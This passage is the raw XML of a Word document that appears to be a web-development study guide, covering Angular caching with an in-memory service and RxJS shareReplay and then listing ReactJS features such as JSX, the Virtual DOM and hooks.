    <w:p w14:paraId="4CA05BC9"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providedIn: 'root'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEE046A"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4C2C1A8B"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CacheService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53031DA3"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private cache = new Map&lt;string, any&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3994D992" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E6B8A56"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get(key: string): any {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA6C5FC"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return this.cache.get(key);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F06059F"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2512A3FE" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="572A0B3B"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set(key: string, value: any): void {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FDCCF9"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his.cache.set(key, value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAD2D91"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57BA0DF6" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17B671A2"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clear(): void {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D321078"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his.cache.clear();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14AEA36A"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0ABFC87E"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7A7B38FA" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724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5. Caching API Calls with RxJS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6445B94B"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You can cache the result of an HTTP API call using RxJS operators such as shareReplay or publishReplay, which ensures that the HTTP call is only made once, and the result is shared with multiple subscribers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E2506E"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 HttpClient } from '@angular/common/http';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4234722A"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 Observable } from 'rxjs';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710C85CE"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 shareReplay } from 'rxjs/operators';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087613CB" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34E21236"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njectable({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE175AF"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providedIn: 'root'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676CB322"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50210328"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class DataService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D82ED46"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private apiCache: Observable&lt;any&gt;;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D564CE" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F890C87"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constructor(private http: HttpClient) {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B25AC8" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A" w:rsidP="003C7C02">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="305165ED"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getData(): Observable&lt;any&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC00293"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    if (!this.apiCache) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2F9434"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his.apiCache = this.http.get('/api/data').pipe(shareReplay(1));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E55375A"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063954D6"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return this.apiCache;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607840C0"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0058E9A2"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6E07A432" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363302C9"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Angular offers multiple approaches for caching depending on your requirements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFE9B2E"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HttpInterceptor</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for caching HTTP requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B941C77"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Service Workers</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for caching assets and data offline in PWAs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C14B229"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localStorage/sessionStorage</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for persistent caching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510399D2"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In-memory caching</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for temporary data storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1230FFB5"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RxJS operators</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like shareReplay to manage API call caching efficiently.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCE843D" w14:textId="77777777" w:rsidR="00CC724A" w:rsidRPr="003C7C02" w:rsidRDefault="00CC724A"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hese techniques help improve the performance and user experience by reducing redundant network calls and enabling offline capabilities in Angular applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B7838E" w14:textId="648FFEA3" w:rsidR="00FC4E71" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00FC4E71">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="077FB430">
          <v:rect id="_x0000_i3541" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F09A22" w14:textId="57A4D2AA" w:rsidR="00E8719B" w:rsidRPr="00CE4B95" w:rsidRDefault="00E8719B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5813AE63" w14:textId="0CAF2DC5" w:rsidR="00E8719B" w:rsidRPr="00CE4B95" w:rsidRDefault="00E8719B" w:rsidP="00E8719B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="871" w:name="_Toc196308351"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>React</w:t>
      </w:r>
      <w:bookmarkEnd w:id="871"/>
    </w:p>
    <w:p w14:paraId="709A722E" w14:textId="77777777" w:rsidR="0011568F" w:rsidRPr="00CE4B95" w:rsidRDefault="0011568F" w:rsidP="0011568F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1210C589" w14:textId="207BD278" w:rsidR="00F9109D" w:rsidRPr="00CE4B95" w:rsidRDefault="008531F8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="872" w:name="_Toc196308352"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Features of ReactJS</w:t>
      </w:r>
      <w:r w:rsidR="00F9109D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="872"/>
    </w:p>
    <w:p w14:paraId="4A9928CD" w14:textId="084E487C" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E1" w:rsidP="003C7C02">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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actJS is a popular JavaScript library for building user interfaces, especially for single-page applications (SPAs). Here are some key features of ReactJS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BF2433" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E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 Component-Based Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDCAFA9"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React is based on the concept of components, which are reusable and independent building blocks that make up the UI. Components can be either </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>class-based</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004BDF68"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ach component has its own state and props, making it modular and maintainable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C659BE"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Component hierarchy</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> helps in creating a structured UI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496DBA5F" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E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2. JSX (JavaScript XML)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1193A967"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JSX is a syntax extension for JavaScript that allows HTML-like code to be written within JavaScript code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D6948E"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t is compiled to JavaScript at runtime, making it easy to write and understand UI code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0DF803"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JSX makes it easy to define UI structure directly in the code, improving readability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F03833" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E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3. Virtual DOM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A8BD57"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React uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Virtual DOM</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to efficiently update the real DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F749104"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hen the state of a component changes, React first updates the Virtual DOM and then compares it with the previous Virtual DOM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EC1B32"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The difference (called </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>diffing</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) is then reflected in the real DOM in the most efficient way possible, leading to better performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDC37B7" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E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4. One-Way Data Binding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54522632"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React follows </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>one-way data binding</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, meaning data flows in one direction, from parent to child components via </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>props</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E902746"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his makes it easier to debug, as you can trace the flow of data in the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3FA3D7" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E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5. State Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437D28E0"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React allows components to manage their own </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>state</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is used to store data that can change over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3395F4F0"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act provides hooks such as useState and useEffect for managing state and side effects in functional components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE273AE"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act's state is often used in combination with global state management libraries like Redux or Context API for managing more complex state across components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7CA18A" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E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6. Reusability of Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544E2856"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act components are highly reusable, meaning the same component can be used in multiple places in the application with different inputs (props).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556E5929"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his encourages code reusability and maintains consistency in the UI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055F65A5" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E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7. Declarative UI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CB2610"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React makes building UIs </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>declarative</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which means you describe what the UI should look like for each state, and React takes care of updating the UI when the state changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077FF35B"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his contrasts with imperative programming, where you have to specify exactly how to change the UI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A79EBB" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E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8. React Hooks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03816060"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Hooks</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow functional components to manage state, lifecycle methods, and other features that were previously only available in class components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155B00B2"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mmon hooks include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F365A85" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E1"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State for state management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433B8073" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E1"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Effect for handling side effects like API calls and subscriptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBB9757" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E1"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Context for accessing context values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A9BD19" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E1"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Ref for accessing DOM elements directly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C82F6A" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E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9. React Router (for SPA routing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CFCC5A"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act Router is a popular library for enabling client-side routing in React applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39DF602D"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It helps in creating </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>single-page applications (SPAs)</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where the page does not reload entirely when navigating between views.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49798320"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act Router allows you to manage navigation and handle different URL paths with components corresponding to those paths.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A8483A" w14:textId="77777777" w:rsidR="003776E1" w:rsidRPr="003C7C02" w:rsidRDefault="003776E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0. Performance Optimization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E7BE99"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React’s </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reconciliation algorithm</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and Virtual DOM make UI rendering more efficient by minimizing the number of actual DOM manipulations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C87D224"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">React allows optimization through techniques like </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>memoization</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lazy loading</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>code splitting</w:t>
      </w:r>
      <w:r w:rsidRPr="003C7C02">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
